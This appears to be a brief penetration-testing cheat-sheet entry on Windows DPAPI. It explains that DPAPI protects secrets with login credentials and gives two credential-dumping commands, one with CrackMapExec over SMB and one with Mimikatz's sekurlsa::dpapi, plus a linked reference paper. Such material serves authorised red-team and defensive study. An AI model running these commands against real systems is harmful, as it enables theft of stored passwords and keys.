DPAPI (Data Protection Application Programming Interface) is a Windows operating system feature that provides data protection by encrypting sensitive data using a user's login credentials. DPAPI is used by various applications to protect sensitive information such as passwords, keys, and credentials.
If an attacker gains access to a user's login credentials, they can use DPAPI to decrypt the protected data. Therefore, DPAPI is a valuable target for attackers looking to gain access to sensitive information.
# Dumping DPAPI with CrackMapExec
## Requires Local Administrator privileges
crackmapexec smb $ip -u $user -p $password --dpapi
# Dumping DPPAI with Mimikatz
sekurlsa::dpapi{% embed url="https://docs.google.com/viewerng/viewer?url=https://www.synacktiv.com/ressources/univershell_2017_dpapi.pdf" %}